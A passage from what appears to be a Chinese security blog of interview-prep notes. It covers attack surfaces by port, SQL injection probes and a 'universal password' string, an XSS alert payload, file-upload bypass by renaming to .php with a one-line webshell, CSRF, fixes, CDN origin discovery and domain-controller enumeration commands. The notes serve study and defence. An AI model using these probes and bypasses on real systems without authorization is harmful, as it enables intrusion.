<td>爆破&#x2F;注入&#x2F;SA弱口令</td>
</tr>
<tr>
<td>1521</td>
<td>oracle</td>
<td>爆破&#x2F;注入&#x2F;TNS爆破&#x2F;反弹shell</td>
</tr>
<tr>
<td>2375</td>
<td>docker remote api</td>
<td>未授权访问</td>
</tr>
<tr>
<td>3306</td>
<td>mysql的默认端口</td>
<td>爆破&#x2F;注入</td>
</tr>
<tr>
<td>3389</td>
<td>RDP远程桌面连接</td>
<td>爆破&#x2F;shift后门</td>
</tr>
<tr>
<td>7001</td>
<td>weblogic</td>
<td>java反序列化漏洞&#x2F;控制台弱口令</td>
</tr>
<tr>
<td>8080&#x2F;89</td>
<td>Jboss&#x2F;Tomcat&#x2F;Resin</td>
<td>爆破&#x2F;反序列化&#x2F;PUT文件上传</td>
</tr>
</tbody></table>
<h2 id="SQL注入原理"><a href="#SQL注入原理" class="headerlink" title="SQL注入原理"></a>SQL注入原理</h2><p>sql，Structured Query Language，叫做结构化查询语言，管理数据库时用到的一种语言。</p>
<p>SQL注入，即把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令，主要原因是程序没有细致地过滤用户地数据，致使非法数据侵入系统。</p>
<h2 id="反序列化漏洞原理"><a href="#反序列化漏洞原理" class="headerlink" title="反序列化漏洞原理"></a>反序列化漏洞原理</h2><p>序列化就是把对象转换成字节流，便于保存在内存、文件、数据库中；反序列化即逆过程，由字节流还 原成对象。如果Java（PHP）应用对用户输入，即不可信数据做了反序列化处理，那么攻击者可以通过构造恶意 输入，让反序列化产生<strong>非预期的对象</strong>，非预期的对象在产生过程中就有可能带来任意代码执行</p>
<p>Java中：ObjectOutputStream类的writeObject()方法、ObjectInputStream类的readObject()方法</p>
<p>PHP中：serialize()和unserialize()两个函数</p>
<p>问题的根源在于类ObjectInputStream在反序列化时，没有<strong>对生成的对象的类型做限制</strong>；假若反序列化可以设置Java类型的白名单，则不会有如此大的影响。</p>
<h2 id="如何去测试SQL注入-x2F-反序列化-x2F-XSS-x2F-文件上传-x2F-越权漏洞"><a href="#如何去测试SQL注入-x2F-反序列化-x2F-XSS-x2F-文件上传-x2F-越权漏洞" class="headerlink" title="如何去测试SQL注入&#x2F;反序列化&#x2F;XSS&#x2F;文件上传&#x2F;越权漏洞"></a>如何去测试SQL注入&#x2F;反序列化&#x2F;XSS&#x2F;文件上传&#x2F;越权漏洞</h2><ul>
<li>SQL注入：</li>
</ul>
<p>通过查看回显，来判断能不能进行sql注入，是哪种sql注入：数字型？字符型？</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id=1 and 1=1 返回成功</span><br><span class="line">?id=1 and 1=2 返回失败</span><br></pre></td></tr></table></figure>

<p>有回显则是数字型</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27; and &#x27;1&#x27;=&#x27;1	返回成功</span><br><span class="line">?id=1&#x27; and &#x27;1&#x27;=&#x27;2	返回失败</span><br></pre></td></tr></table></figure>

<p>这就是字符型</p>
<blockquote>
<p>搜索<code>&#39;</code>，如果出错，说明90%存在这个漏洞</p>
<p>搜索<code>%</code>，如果正常返回，说明95%有洞了</p>
<p>搜索一个关键字，比如<code>test</code>，正常返回所有test相关的信息</p>
<p>再搜索<code>test%&#39;and 1=1 and &#39;%&#39;=&#39;</code>和<code>test%&#39;and 1=2 and &#39;%&#39;=&#39;</code></p>
</blockquote>
<p>常用：先用万能密码尝试下，类似’ or 1&#x3D;’1这种，先用order by猜列数，猜成功后爆数据库、数据表、列、数据等。</p>
<ul>
<li>反序列化：</li>
</ul>
<p>反序列化操作一般在导入模版文件、网络通信、数据传输、日志格式化存储、对象数据落磁 盘或DB存储等业务场景，在代码审计时可重点关注一些反序列化操作函数并判断输入是否可控</p>
<ul>
<li>XSS：</li>
</ul>
<p>在网站输入框，通过script,img,body等标签，能够插入js语句，表示存在漏洞，比如说alert</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(/xss/)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<ul>
<li>文件上传漏洞：</li>
</ul>
<p>简单的过滤可能在前端，在上传文件的后利用burp拦截，然后将文件后缀名改为.php，如果上传成功，证明存在漏洞 将一句话木马植入图片文件中，上传，成功则存在。</p>
<ul>
<li>越权漏洞：</li>
</ul>
<p>通过正确的账号密码登录，利用burp拦截请求包，发送到repeater里，修改里面的关于id的 内容，根据返回值判断是否获得其他账户信息</p>
<h2 id="文件上传漏洞的绕过方法有哪些"><a href="#文件上传漏洞的绕过方法有哪些" class="headerlink" title="文件上传漏洞的绕过方法有哪些"></a>文件上传漏洞的绕过方法有哪些</h2><p>在文件名后面加上满足上传文件需求的后缀名 上传文件时使用burp拦截，在前端上传成功后在burp里将文件名后缀修改成.php 将一句话木马插入到需要上传的文件中。</p>
<h2 id="SQL注入漏洞有哪些利用手法"><a href="#SQL注入漏洞有哪些利用手法" class="headerlink" title="SQL注入漏洞有哪些利用手法"></a>SQL注入漏洞有哪些利用手法</h2><p>联合查询（union select）</p>
<p>报错注入：注入特殊的语句使报错回显中带上我们需要的信息，常见的报错回显有三种函数extractvalue()、update<a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=xml">xml</a>()、floor()。</p>
<p>布尔盲注：将我们要获取的信息与猜测信息进行比对，正确页面正常，错误时与正确页面有区别。在布尔盲注时我们通常会使用到length()、substr()、ascll()。</p>
<p>延时注入（sleep、if）：注入延时回显参数，根据是否延时来判断语句执行是否正确</p>
<h2 id="比较喜欢用哪几种工具，它们的优势是什么"><a href="#比较喜欢用哪几种工具，它们的优势是什么" class="headerlink" title="比较喜欢用哪几种工具，它们的优势是什么"></a>比较喜欢用哪几种工具，它们的优势是什么</h2><ul>
<li>burpsuite：功能强大，可以实现拦截，代理，爆破等功能，还可以加载各种插件</li>
<li>nmap：方便的查询接口及其状态</li>
<li>sqlmap：使用比较方便，可以轻松实现sql盲注。有自带的tamper，但有的时候需要手动编写来绕过一些过滤。</li>
</ul>
<h2 id="CSRF漏洞的原理"><a href="#CSRF漏洞的原理" class="headerlink" title="CSRF漏洞的原理"></a>CSRF漏洞的原理</h2><p>跨站请求伪造（Cross Site Request Forgery，CSRF）</p>
<ul>
<li>目标用户使用其用户名和密码登录受信任站点，从而创建了一个新的会话，受信任站点则会为目标用户Web浏览器Cookie中的会话信息存储了会话标示符。</li>
<li>测试者往Web应用页面中插入恶意的HTML链接或脚本代码，而目标页面又没有过滤或者过滤不严，那么当用户浏览该页面时，用户的Web浏览器将被操纵向受信任站点发送一个恶意请求，比如删除帖子、添加管理员、添加邮件转发规则、改变路由器的DNS设置等。</li>
<li>Web浏览器将会为这个恶意请求自动附加会话Cookie信息，因为是访问的受信任站点，因此该恶意请求将会成功完成。</li>
</ul>
<p>与XSS相比：</p>
<ul>
<li>XSS：利用用户对站点的信任，攻击者通过注入程序来修改网站来使用户浏览器被重定向等</li>
<li>CSRF：利用站点对已经身份认证的用户的信任，攻击者伪造一个链接误导用户点击链接来使用用户的身份认证来访问服务器</li>
</ul>
<p><img src="https://raw.githubusercontent.com/Cloudyunn/img/master/note/202201101519628.png" alt="CSRF原理"></p>
<h2 id="SQL注入、反序列化、文件包含、文件上传、CSRF、XSS、XXE漏洞的修复方法"><a href="#SQL注入、反序列化、文件包含、文件上传、CSRF、XSS、XXE漏洞的修复方法" class="headerlink" title="SQL注入、反序列化、文件包含、文件上传、CSRF、XSS、XXE漏洞的修复方法"></a>SQL注入、反序列化、文件包含、文件上传、CSRF、XSS、XXE漏洞的修复方法</h2><ul>
<li>sql注入：<ul>
<li>所有查询语句都使用数据库的参数化查询接口，并且参数化语句使用参数，而不是将用户输入变量直接嵌入到SQL语句中。</li>
<li>对进入数据库的特殊字符（’”&lt;&gt;&amp;*;等）进行转义处理，或编码转换</li>
<li>应严格规定数据长度，防止较长的SQL注入语句</li>
<li>不回显错误信息</li>
<li>严格限制网站用户数据库操作权限</li>
</ul>
</li>
<li>反序列化：<ul>
<li>升级到最新版本</li>
</ul>
</li>
<li>文件包含：<ul>
<li>设置文件上传白名单</li>
<li>升级程序</li>
</ul>
</li>
<li>文件上传：<ul>
<li>上传文件的存储目录禁用执行权限</li>
<li>文件后缀白名单，注意0x00截断攻击</li>
<li>文件上传后修改文件名</li>
<li>不能有本地文件包含漏洞</li>
<li>及时修复web上代码</li>
<li>升级web server</li>
</ul>
</li>
<li>CSRF<ul>
<li>验证http referer字段</li>
<li>请求地址中添加token并验证</li>
<li>在http头中自定义属性并验证</li>
</ul>
</li>
<li>XSS<ul>
<li>创建参数拦截filter类过滤器，对每次Post请求或者PUT请求坐下拦截</li>
</ul>
</li>
<li>XXE<ul>
<li>进制加载外部实体</li>
<li>不允许XML中含有任何自己声明的DTD</li>
</ul>
</li>
</ul>
<h2 id="如果网站有CDN，你如何查看他的真实IP地址"><a href="#如果网站有CDN，你如何查看他的真实IP地址" class="headerlink" title="如果网站有CDN，你如何查看他的真实IP地址"></a>如果网站有CDN，你如何查看他的真实IP地址</h2><blockquote>
<p>查询子域名 </p>
<p>网络空间引擎搜索法（钟馗之眼) </p>
<p>利用SSL证书寻找真实原始IP </p>
<p>利用HTTP标头寻找真实原始IP </p>
<p>利用网站返回的内容寻找真实原始IP</p>
<p>网站邮件订阅查找</p>
<p>用 Zmap 扫全网</p>
</blockquote>
<h2 id="如何判断是否有CDN"><a href="#如何判断是否有CDN" class="headerlink" title="如何判断是否有CDN"></a>如何判断是否有CDN</h2><p>CDN的全称是Content Delivery Network，即内容分发网络。通过在网络各处放置节点服务 器所构成的在现有的互联网基础之上的一层智能虚拟网络。其目的就是使用户可以就近取得所需的内容，解决Internet网络拥挤的状况，提高用户访问网络 的响应速度。</p>
<p><strong>检测方法</strong>：在Linux下使用dig命令进行测试或者DOS下使用nslookup进行测试。还有一个办法就是在不同的地区ping网址，如果都是同一个IP地址，则说明未使用CDN，如果是不同的 IP地址则说明使用了CDN。</p>
<h2 id="常见提权方式"><a href="#常见提权方式" class="headerlink" title="常见提权方式"></a>常见提权方式</h2><p>udf提权、mof提权、启动项提权等</p>
<h2 id="如果服务器被入侵，你会怎样进行溯源"><a href="#如果服务器被入侵，你会怎样进行溯源" class="headerlink" title="如果服务器被入侵，你会怎样进行溯源"></a>如果服务器被入侵，你会怎样进行溯源</h2><ul>
<li>网站源码分析、审计</li>
<li>日志分析</li>
<li>系统存储信息分析</li>
<li>分析进程端口</li>
</ul>
<h2 id="常见的中间件解析漏洞有哪些"><a href="#常见的中间件解析漏洞有哪些" class="headerlink" title="常见的中间件解析漏洞有哪些"></a>常见的中间件解析漏洞有哪些</h2><ul>
<li>1、IIS<ul>
<li>PUT漏洞</li>
<li>短文件名猜解</li>
<li>远程代码执行</li>
<li>解析漏洞</li>
</ul>
</li>
<li>2、Apache<ul>
<li>解析漏洞</li>
<li>目录遍历</li>
</ul>
</li>
<li>3、Nginx<ul>
<li>文件解析</li>
<li>目录遍历</li>
<li>CRLF注入</li>
<li>目录穿越</li>
</ul>
</li>
<li>4、Tomcat<ul>
<li>远程代码执行</li>
<li>war后门文件部署</li>
</ul>
</li>
<li>5、jBoss<ul>
<li>反序列化漏洞</li>
<li>war后门文件部署</li>
</ul>
</li>
<li>6、Weblogic<ul>
<li>反序列化漏洞</li>
<li>SSRF</li>
<li>任意文件上传</li>
<li>war后门文件部署</li>
</ul>
</li>
</ul>
<h2 id="在Windows-x2F-linux的加固问题上，你有哪些方法"><a href="#在Windows-x2F-linux的加固问题上，你有哪些方法" class="headerlink" title="在Windows&#x2F;linux的加固问题上，你有哪些方法"></a>在Windows&#x2F;linux的加固问题上，你有哪些方法</h2><h2 id="linux服务器被植入后门了，讲一下你的排查流程"><a href="#linux服务器被植入后门了，讲一下你的排查流程" class="headerlink" title="linux服务器被植入后门了，讲一下你的排查流程"></a>linux服务器被植入后门了，讲一下你的排查流程</h2><ul>
<li>（1）检查系统日志<ul>
<li>检查系统错误登录日志，统计IP重试次数</li>
</ul>
</li>
<li>（2）检查系统用户<ul>
<li>查看是否有异常的系统用户</li>
</ul>
</li>
<li>（3）检查异常进程<ul>
<li>注意UID为0的进程</li>
</ul>
</li>
<li>（4）检查异常系统文件</li>
<li>（5）检查系统文件完整性</li>
<li>（6）检查RPM的完整性</li>
<li>（7）检查网络</li>
<li>（8）检查系统后门</li>
<li>（9）检查系统服务</li>
<li>（10）检查rootkit</li>
</ul>
<h2 id="怎么查找域控"><a href="#怎么查找域控" class="headerlink" title="怎么查找域控"></a>怎么查找域控</h2><p>1、net view</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net view /domain</span><br></pre></td></tr></table></figure>

<p>2、set log</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set log</span><br></pre></td></tr></table></figure>

<p>3、通过srv记录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nslookup -type=SRV _ldap._tcp.corp</span><br></pre></td></tr></table></figure>

<p>4、使用nltest</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nltest /dclist:corp</span><br></pre></td></tr></table></figure>

<p>5、使用dsquery</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DsQuery Server -domain corp</span><br></pre></td></tr></table></figure>

<p>6、使用netdom</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netdom query pdc</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E7%BD%91%E5%AE%89/" rel="tag"><i class="fa fa-tag"></i> 网安</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/01/06/05-Fuzzing%E8%AE%BA%E6%96%87%E9%98%85%E8%AF%BB%E7%AC%94%E8%AE%B0(%E4%B8%80)%20/" rel="prev" title="Fuzzing论文阅读笔记(一)">
                  <i class="fa fa-chevron-left"></i> Fuzzing论文阅读笔记(一)
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/02/19/07-Java%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0(%E4%B8%80)/" rel="next" title="Java学习笔记(一)——基本特性">
                  Java学习笔记(一)——基本特性 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 2021 – 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Yann Cheung</span>
</div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
      <span>Word count total: </span>
    <span title="Word count total">274k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span>Reading time total &asymp;</span>
    <span title="Reading time total">4:09</span>
  </span>
</div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="reading-progress-bar"></div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.3/jquery.min.js" integrity="sha256-pvPw+upLPUjgMXY0G+8O0xUf+/Im1MZjXxxgOcBQBXU=" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.js" integrity="sha256-yt2kYMy0w8AbtF89WXb2P1rfjcP/HTHLT7097U8Y5b8=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script><script src="/js/bookmark.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>



  <script src="/js/third-party/fancybox.js"></script>


  





</body>
</html>
